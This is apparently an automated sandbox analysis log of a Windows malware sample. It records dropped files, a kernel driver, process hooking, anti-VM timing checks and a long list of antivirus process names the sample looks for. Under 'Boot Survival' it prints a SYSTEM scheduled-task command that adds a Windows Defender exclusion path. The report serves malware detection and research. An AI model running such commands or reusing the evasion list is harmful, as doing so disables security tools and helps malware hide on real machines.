Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: etoken.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: wininet.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: iertutil.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: sspicli.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: windows.storage.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: wldp.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: profapi.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: winhttp.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: mswsock.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: winnsi.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: dpapi.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: msasn1.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: cryptsp.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: rsaenh.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: cryptbase.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: gpapi.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: urlmon.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: srvcli.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: netutils.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: dnsapi.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: schannel.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: mskeyprotect.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: ntasn1.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: ncrypt.dll
Source: C:\Users\user\Documents\J8daaU.exeSection loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Gokod.763652.06.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeFile written: C:\Users\Public\Music\destopbak.iniJump to behavior
Source: Gokod.763652.06.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: Gokod.763652.06.exeStatic file information: File size 31995126 > 1048576
Source: Gokod.763652.06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Gokod.763652.06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Gokod.763652.06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Gokod.763652.06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Gokod.763652.06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Gokod.763652.06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Gokod.763652.06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\CodeBases\isdev\redist\language independent\x64\SetupSuite64.pdb source: Gokod.763652.06.exe
Source: Binary string: C:\new-builder\SAC-10.9-dev\master\SAC\Solutions\x64\Release\ManageReaders.pdb source: J8daaU.exe, 00000008.00000002.1541949190.00007FF6FCAF1000.00000002.00000001.01000000.0000000A.sdmp, J8daaU.exe, 00000008.00000000.1527093516.00007FF6FCAF1000.00000002.00000001.01000000.0000000A.sdmp, J8daaU.exe, 00000009.00000000.1637253845.00007FF6FCAF1000.00000002.00000001.01000000.0000000A.sdmp, J8daaU.exe, 00000037.00000000.2227008485.00007FF6FCAF1000.00000002.00000001.01000000.0000000A.sdmp, J8daaU.exe, 00000037.00000002.2417861079.00007FF6FCAF1000.00000002.00000001.01000000.0000000A.sdmp, J8daaU.exe.0.dr
Source: Binary string: C:\Users\qt\work\qt\qtvirtualkeyboard\plugins\virtualkeyboard\qtvirtualkeyboard_openwnn.pdb<< source: Gokod.763652.06.exe
Source: Binary string: F:\4.7.471.07\Sources\_bin\32\Release\PhilipsSpeechDriverConfiguration.pdb source: J8daaU.exe, 00000009.00000003.1879353261.000001F5AA04E000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2417698713.000002B8761F0000.00000004.00000020.00020000.00000000.sdmp, 4xCNoe.exe.9.dr, u0syUl.exe.55.dr
Source: Binary string: D:\dev\navicatlibs\windows\x64\Release\libqb.pdb source: Gokod.763652.06.exe
Source: Binary string: C:\Users\qt\work\qt\qtquickcontrols2\lib\Qt5QuickTemplates2.pdb source: Gokod.763652.06.exe
Source: Binary string: D:\dev\navicatlibs\windows\x64\Release\libqb.pdbII(!GCTL source: Gokod.763652.06.exe
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: aceprocted.sys.0.dr
Source: Binary string: C:\Users\qt\work\qt\qtvirtualkeyboard\plugins\virtualkeyboard\qtvirtualkeyboard_openwnn.pdb source: Gokod.763652.06.exe
Source: Gokod.763652.06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Gokod.763652.06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Gokod.763652.06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Gokod.763652.06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Gokod.763652.06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Documents\J8daaU.exeCode function: 8_2_00007FF6FCAE190C GetCurrentProcessId,ProcessIdToSessionId,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,GetFileAttributesW,GetLastError,FileTimeToLocalFileTime,FileTimeToSystemTime,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LocalFree,FileTimeToLocalFileTime,FileTimeToSystemTime,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LocalFree,FreeLibrary,8_2_00007FF6FCAE190C
Source: initial sampleStatic PE information: section where entry point is pointing to: .{,3
Source: J8daaU.exe.0.drStatic PE information: section name: _RDATA
Source: eToken.dll.0.drStatic PE information: section name: .QO
Source: eToken.dll.0.drStatic PE information: section name: .h1c
Source: eToken.dll.0.drStatic PE information: section name: .{,3

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\Gokod.763652.06.exeFile created: C:\Users\user\Documents\eToken.dllJump to dropped file
Source: C:\Users\user\Desktop\Gokod.763652.06.exeFile created: C:\Users\user\Documents\J8daaU.exeJump to dropped file
Source: C:\Users\user\Desktop\Gokod.763652.06.exeFile created: C:\Windows\Temp\aceprocted.sysJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Users\user\Desktop\Gokod.763652.06.exeFile created: C:\Windows\Temp\aceprocted.sysJump to dropped file
Source: C:\Users\user\Desktop\Gokod.763652.06.exeFile created: C:\Users\user\Documents\eToken.dllJump to dropped file
Source: C:\Users\user\Desktop\Gokod.763652.06.exeFile created: C:\Users\user\Documents\J8daaU.exeJump to dropped file
Source: C:\Users\user\Documents\J8daaU.exeFile created: C:\Program Files (x86)\u0syUl\u0syUl.exeJump to dropped file
Source: C:\Users\user\Documents\J8daaU.exeFile created: C:\Program Files (x86)\4xCNoe\4xCNoe.exeJump to dropped file
Source: C:\Users\user\Desktop\Gokod.763652.06.exeFile created: C:\Windows\Temp\aceprocted.sysJump to dropped file

Boot Survival

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Documents\J8daaU.exeMemory written: PID: 6360 base: 7FFCC3890008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeMemory written: PID: 6360 base: 7FFCC372D9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeMemory written: PID: 6360 base: 7FFCC38A0005 value: E9 EB D9 E8 FF Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeMemory written: PID: 6360 base: 7FFCC372D9F0 value: E9 1A 26 17 00 Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeMemory written: PID: 7992 base: 7FFCC3890008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeMemory written: PID: 7992 base: 7FFCC372D9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeMemory written: PID: 7992 base: 7FFCC38A0005 value: E9 EB D9 E8 FF Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeMemory written: PID: 7992 base: 7FFCC372D9F0 value: E9 1A 26 17 00 Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeMemory written: PID: 4056 base: 7FFCC3890008 value: E9 EB D9 E9 FF
Source: C:\Users\user\Documents\J8daaU.exeMemory written: PID: 4056 base: 7FFCC372D9F0 value: E9 20 26 16 00
Source: C:\Users\user\Documents\J8daaU.exeMemory written: PID: 4056 base: 7FFCC38A0005 value: E9 EB D9 E8 FF
Source: C:\Users\user\Documents\J8daaU.exeMemory written: PID: 4056 base: 7FFCC372D9F0 value: E9 1A 26 17 00
Source: C:\Users\user\Documents\J8daaU.exeCode function: 8_2_00007FF6FCAE1000 GetCurrentThreadId,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentThreadId,Sleep,8_2_00007FF6FCAE1000
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: GETDATAC:\USERS\TTRUESPANL.SYS360SAFE.EXE360SD.EXE360RP.EXE360RPS.EXE360TRAY.EXEZHUDONGFANGYU.EXELIVEUPDATE360.EXE360LEAKFIXER.EXE360SDRUN.EXE360SDUPD.EXE360FILEGUARD.EXEDEP360.EXESRAGENT.EXEMODULEUPDATE.EXEFILESMASHER.EXEAGREEMENTVIEWER.EXESOFTMGRLITE.EXEKANKAN.EXESUPERKILLER.EXEDUMPUPER.EXEDSMAIN.EXEDSMAIN64.EXEFIRSTAIDBOX.EXECHECKSM.EXEHIPSMAIN.EXEHIPSDAEMON.EXEHIPSTRAY.EXEHRUPDATE.EXEHIPSLOG.EXENETFLOW.EXEAUTORUNS.EXEUSYSDIAG.EXEWSCTRLSVC.EXEWSCTRL.EXEKXEMAIN.EXEKXESCORE.EXEKSCAN.EXEKXECENTER.EXEKXETRAY.EXEKDINFOMGR.EXEKISLIVE.EXEKNEWVIP.EXEKSOFTPURIFIER.EXEKTRASHAUTOCLEAN.EXEKAUTHORITYVIEW.EXETQCLIENT.EXETQEDRNAME.EXETQSAFEUI.EXETQTRAY.EXETRANTORAGENT.EXETQDEFENDER.EXETQUPDATEUI.EXETQWATERMARK.EXEDLPAPPDATA.EXENACLDIS.EXEMSMPENG.EXEMPCMDRUN.EXELDSHELPER.EXELDSSECURITY.EXELDSSECURITYAIDER.EXECOMPUTERZTRAY.EXECOMPUTERCENTER.EXEGUARDHP.EXECOMPUTERZ_CN.EXECOMPUTERZSERVICE.EXECOMPUTERZSERVICE_X64.EXEHDW_DISK_SCAN.EXECOMPUTERZMONHELPER.EXEDRVMGR.EXEWEB_HOST.EXE2345SAFECENTERSVC.EXE2345RTPROTECT.EXE2345SAFESVC.EXE2345MPCSAFE.EXE2345SAFETRAY.EXE2345SAFEUPDATE.EXE2345VIRUSSCAN.EXE2345MANUUPDATE.EXE2345ADRTPROTECT.EXE2345AUTHORITYPROTECT.EXE2345EXTSHELL.EXE2345EXTSHELL64.EXE2345FILESHRE.EXE2345LEAKFIXER.EXE2345LSPFIX.EXE2345PCSAFEBOOTASSISTANT.EXE2345RTPROTECTCENTER.EXE2345SHELLPRO.EXE2345SYSDOCTOR.EXELENOVOPCMANAGERSERVICE.EXELENOVOPCMANAGER.EXELAVSERVICE.EXELENOVOTRAY.EXELNVSVCFDN.EXEWSCTRL7.EXEWSCTRL10.EXEWSCTRL11.EXELENOVOAPPUPDATE.EXELENOVOAPPSTORE.EXEDESKTOPASSISTANTAPP.EXEDESKTOPASSISTANT.EXELENOVOMONITORMANAGER.EXELENOVOOKM.EXELEASHIVE.EXESTARTUPMANAGER.EXEWSPLUGINHOST.EXEWSPLUGINHOST64.EXECRASHPAD_HANDLER.EXESEARCHENGINE.EXELISFSERVICE.EXELSF.EXEAPPVANT.EXELENOVOINTERNETSOFTWAREFRAMEWORK.EXEEMDRIVERASSIST.EXELEAPPOM.EXEHOTFIXPLATFORM.EXEMSPCMANAGER.EXEMSPCMANAGERSERVICE.EXEAVP.EXEAVPUI.EXEAVASTSVC.EXEASWTOOLSSVC.EXEASWIDSAGENT.EXEWSC_PROXY.EXEAVASTUI.EXEAVIRA.SPOTLIGHT.SERVICE.EXEENDPOINTPROTECTION.EXESENTRYEYE.EXEAVIRA.SPOTLIGHT.COMMON.UPDATER.EXEAVIRA.SPOTLIGHT.FALLBACKUPDATER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.EXEAVIRA.SPOTLIGHT.SYSTRAY.APPLICATION.EXEAVIRA.OPTIMIZERHOST.EXEAVIRA.SPOTLIGHT.BOOTSTRAPPER.EXEAVIRA.SPOTLIGHT.SERVICE.WORKER.EXEAVIRA.SPOTLIGHT.COMMON.UPDATERTRACKER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.MESSAGING.EXEAVIRA.SPOTLIGHT.UI.ADMINISTRATIVERIGHTSPROVIDER.EXEMFEMMS.EXEMFEVTPS.EXEMCAPEXE.EXEMCSHIELD.EXEMCUICNT.EXEMFEAVSVC.EXENISSRV.EXESECURITYHEALTHSYSTRAY.EXEKWSPROTECT64.EXEQMDL.EXEQMPERSONALCENTER.EXEQQPCPATCH.EXEQQPCREALTIMESPEEDUP.EXEQQPCRTP.EXEQQPCTRAY.EXEQQREPAIR.EXEQQPCMGRUPDATE.EXEKSAFETRAY.EXEMPCOPYACCELERATOR.EXEUNTHREAT.EXEK7TSECURITY.EXEAD-WATCH.EXEPSAFESYSTRAY.EXEVSSERV.EXEREMUPD.EXERTVSCAN.EXEASHDISP.EXEAVCENTER.EXETMBMSRV.EXEKNSDTRAY.EXEV3SVC.EXEMSSECESS.EXEQUHLPSVC.EXERAVMOND.EXEKVMONXP.EXEBAIDUSAFETRAY.EXEBAIDUSD.EXEBKA.EXEBKAVSERVICE.EXEBKAVSYSTEMSERVER.EXEBKAVSYSTEMSERVICE.EXEBKAVSYSTEMSERVICE64.EXEBKAVUTIL.EXEBLUPRO.EXEBLUPROSERVICE.EXECEFUTIL.EXEPOPWNDLOG.EXEPROMOUTIL.EXEQHACTIVEDEFENSE.EXEQHSAFEMAIN.EXEQHS
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXE
Source: C:\Users\user\Desktop\Gokod.763652.06.exeRDTSC instruction interceptor: First address: 1400011AD second address: 1400011C4 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Gokod.763652.06.exeRDTSC instruction interceptor: First address: 1400011C4 second address: 1400011C4 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007F6FE50F5C20h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Gokod.763652.06.exeRDTSC instruction interceptor: First address: 1FA600 second address: 1FA600 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 mov ecx, dword ptr [esp+24h] 0x0000000d add ecx, eax 0x0000000f mov eax, ecx 0x00000011 mov dword ptr [esp+24h], eax 0x00000015 jmp 00007F6FE47641F7h 0x00000017 mov eax, dword ptr [esp+20h] 0x0000001b inc eax 0x0000001d mov dword ptr [esp+20h], eax 0x00000021 cmp dword ptr [esp+20h], 000003E8h 0x00000029 jnl 00007F6FE4764239h 0x0000002b rdtsc
Source: C:\Users\user\Documents\J8daaU.exeRDTSC instruction interceptor: First address: 1F5A6301E95 second address: 1F5A6301EA3 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc
Source: C:\Users\user\Documents\J8daaU.exeRDTSC instruction interceptor: First address: 2B87364A685 second address: 2B87364A693 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc
Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeCode function: 55_2_000002B87364A685 rdtsc 55_2_000002B87364A685
Source: C:\Users\user\Desktop\Gokod.763652.06.exeDropped PE file which has not been started: C:\Windows\Temp\aceprocted.sysJump to dropped file
Source: C:\Users\user\Documents\J8daaU.exeDropped PE file which has not been started: C:\Program Files (x86)\u0syUl\u0syUl.exeJump to dropped file
Source: C:\Users\user\Documents\J8daaU.exeDropped PE file which has not been started: C:\Program Files (x86)\4xCNoe\4xCNoe.exeJump to dropped file
Source: C:\Users\user\Documents\J8daaU.exeAPI coverage: 2.0 %
Source: C:\Users\user\Documents\J8daaU.exeAPI coverage: 5.1 %
Source: C:\Windows\System32\svchost.exe TID: 7948Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\J8daaU.exe TID: 1372Thread sleep count: 54 > 30Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe TID: 1208Thread sleep count: 86 > 30Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe TID: 4412Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeLast function: Thread delayed
Source: C:\Users\user\Documents\J8daaU.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
